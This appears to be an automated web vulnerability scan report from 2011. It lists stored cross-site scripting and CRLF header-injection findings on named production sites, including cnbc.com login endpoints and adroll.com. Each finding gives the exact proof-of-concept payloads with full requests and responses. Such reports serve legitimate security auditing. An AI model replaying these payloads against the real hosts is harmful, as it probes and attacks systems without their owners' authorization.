29.76. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

29.77. http://www.rayalab.com/Scripts/AC_RunActiveContent.js

29.78. http://www.rayalab.com/animate.js

29.79. http://www.rayalab.com/favicon.ico

29.80. http://www.rayalab.com/flexcroll.js

29.81. http://www.resourcepoint.net/form.htm

29.82. http://www.revsolutionsinc.com/animated_favicon1.gif

29.83. http://www.sophelle.com/graphic/bullet-sm-w.gif

29.84. http://www.sophelle.com/images/sophelle-ico.ico

30. HTML uses unrecognised charset

31. Content type incorrectly stated

31.1. http://4qinvite.4q.iperceptions.com/1.aspx

31.2. http://a1.interclick.com/getInPageJS.aspx

31.3. http://a1.interclick.com/getInPageJSProcess.aspx

31.4. https://account.bigcommerce.com/mailer/form.php

31.5. http://ad.doubleclick.net/clk

31.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

31.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

31.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

31.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

31.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

31.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

31.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

31.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

31.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

31.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

31.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

31.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

31.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

31.19. http://ads.pointroll.com/PortalServe/

31.20. http://api-cdn.cnbc.com/api/chart/chart.asp

31.21. http://api.cnbc.com/api/chart/chart.asp

31.22. http://api.viglink.com/api/ping

31.23. http://apps.cnbc.com/Includes/CheckPng/Script.asp

31.24. http://assets1.csc.com/contact_us/media/contact_us4.css

31.25. http://assets1.csc.com/services/media/services3.css

31.26. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

31.27. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

31.28. http://blog.harbottle.com/dm/xmlrpc.php

31.29. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

31.30. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

31.31. http://blogs.oracle.com/otn/resource/SunOracle.png

31.32. http://blogs.oracle.com/otn/resource/java-logo.png

31.33. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

31.34. http://blogs.oracle.com/theme/scripts/roller.js

31.35. http://content.plymedia.com/initialize

31.36. http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load

31.37. http://education.oracle.com/education/css/oracle.css

31.38. http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries

31.39. https://event.on24.com/eventRegistration/prereg/register.jsp

31.40. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

31.41. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

31.42. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

31.43. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

31.44. https://forums.oracle.com/forums/themes/english/resources/s_code.js

31.45. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

31.46. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

31.47. https://forums.oracle.com/forums/themes/english/resources/style.css

31.48. http://goku.brightcove.com/1pix.gif

31.49. http://imp.fetchback.com/serve/fb/adtag.js

31.50. http://l.apture.com/v3/

31.51. http://m.cnbc.com/mytest/ipecho.php

31.52. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/

31.53. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/

31.54. http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/

31.55. http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81

31.56. http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14

31.57. http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel

31.58. https://myprofile.oracle.com/EndUser/images/fading-background.png

31.59. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

31.60. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

31.61. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

31.62. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

31.63. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

31.64. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

31.65. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

31.66. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.67. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

31.68. http://ping.crowdscience.com/ping.js

31.69. http://pixel.fetchback.com/serve/fb/pdc

31.70. https://register.cnbc.com/RandomImage.jsp

31.71. http://rt.disqus.com/forums/realtime-cached.js

31.72. http://rt.legolas-media.com/lgrt

31.73. http://rww.readwriteweb.netdna-cdn.com/favicon.ico

31.74. http://s7.addthis.com/js/addthis_widget.php

31.75. http://server.iad.liveperson.net/hcp/html/mTag.js

31.76. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

31.77. http://sophelle.app5.hubspot.com/salog.js.aspx

31.78. http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.79. http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.80. http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.81. http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.82. http://tps31.doubleverify.com/visit.js

31.83. http://wd.sharethis.com/api/getCount2.php

31.84. http://www.atg.com/favicon.ico

31.85. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

31.86. https://www.atg.com/favicon.ico

31.87. https://www.atg.com/svc-common/script/propertyFunc.js.jsp

31.88. http://www.cnbc.com/id/24596694/

31.89. http://www.facebook.com/extern/login_status.php

31.90. http://www.fekkai.com/js/imageLoader.json

31.91. http://www.gillettevenus.com/favicon.ico

31.92. http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js

31.93. http://www.google.com/search

31.94. http://www.harbottle.com/favicon.ico

31.95. http://www.marykay.com/images/icn_fb.jpg

31.96. http://www.marykay.com/images/icn_yt.jpg

31.97. http://www.netsuite.com/portal/javascript/effects.js

31.98. http://www.netsuite.com/portal/javascript/prototype.js

31.99. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg

31.100. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg

31.101. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg

31.102. http://www.oracle.com/pls/ebn/live_viewer.main

31.103. http://www.oracle.com/pls/ebn/swf_viewer.load

31.104. http://www.oracle.com/pls/ebn/wm_viewer.main

31.105. http://www.sophelle.com/graphic/cq_logo-250.gif

32. Content type is not specified

32.1. http://ads.pointroll.com/PortalServe/

32.2. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

32.3. https://login.oracle.com/mysso/sso_loginui/sso_check.js

32.4. https://login.oracle.com/oam/server/sso/auth_cred_submit

32.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

32.6. http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js

32.7. http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js

32.8. http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js



1. Cross-site scripting (stored)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a5fc9<script>alert(1)</script>0f409039ab9 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9

Request 2

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:21 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

2. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 752c7%0d%0afa8ce4cf6fd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/752c7%0d%0afa8ce4cf6fd/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:47 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/752c7
fa8ce4cf6fd
/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 36bd2%0d%0a9786dda38d3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/36bd2%0d%0a9786dda38d3?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:48 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/EBPLYDUJ5RCZ3C7MBENLBV/36bd2
9786dda38d3
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /tpauth/rest/authenticate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 294ce%0d%0adc6a298c2de was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=subscription&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce%0d%0adc6a298c2de=1 HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=D2C022C9CFF6DFB9157CD240DA8DE1A9; Path=/tpauth
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce
dc6a298c2de
=1&login_view=subscription
Content-Length: 0
Content-Type: text/plain


2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /tpauth/rest/authenticate

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 33200%0d%0a0f3f561d3b4 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=33200%0d%0a0f3f561d3b4&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=33200
0f3f561d3b4

Content-Length: 0
Content-Type: text/plain


2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /memberCenter.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ef6d%0d%0a743079059dd was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /memberCenter.do?4ef6d%0d%0a743079059dd=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:52 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&4ef6d
743079059dd
=1&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:52 GMT; path=/


2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d0ea7%0d%0a3c7455c6879 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/&d0ea7%0d%0a3c7455c6879=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:20 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&d0ea7
3c7455c6879
=1&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:20 GMT; path=/


2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 42dc1%0d%0ad1b7bab4e94 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=42dc1%0d%0ad1b7bab4e94&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:19 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=42dc1%0D%0Ad1b7bab4e94&login_view=42dc1
d1b7bab4e94

Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:19 GMT; path=/


2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /registerUser.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bc1b6%0d%0a38769824fca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /registerUser.do?bc1b6%0d%0a38769824fca=1 HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=8949562430B64F70CC4A99E0D5131B41; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/refreshlogin.jsp?bc1b6
38769824fca
=1
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/


3. Cross-site scripting (reflected)  previous  next
There are 100 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

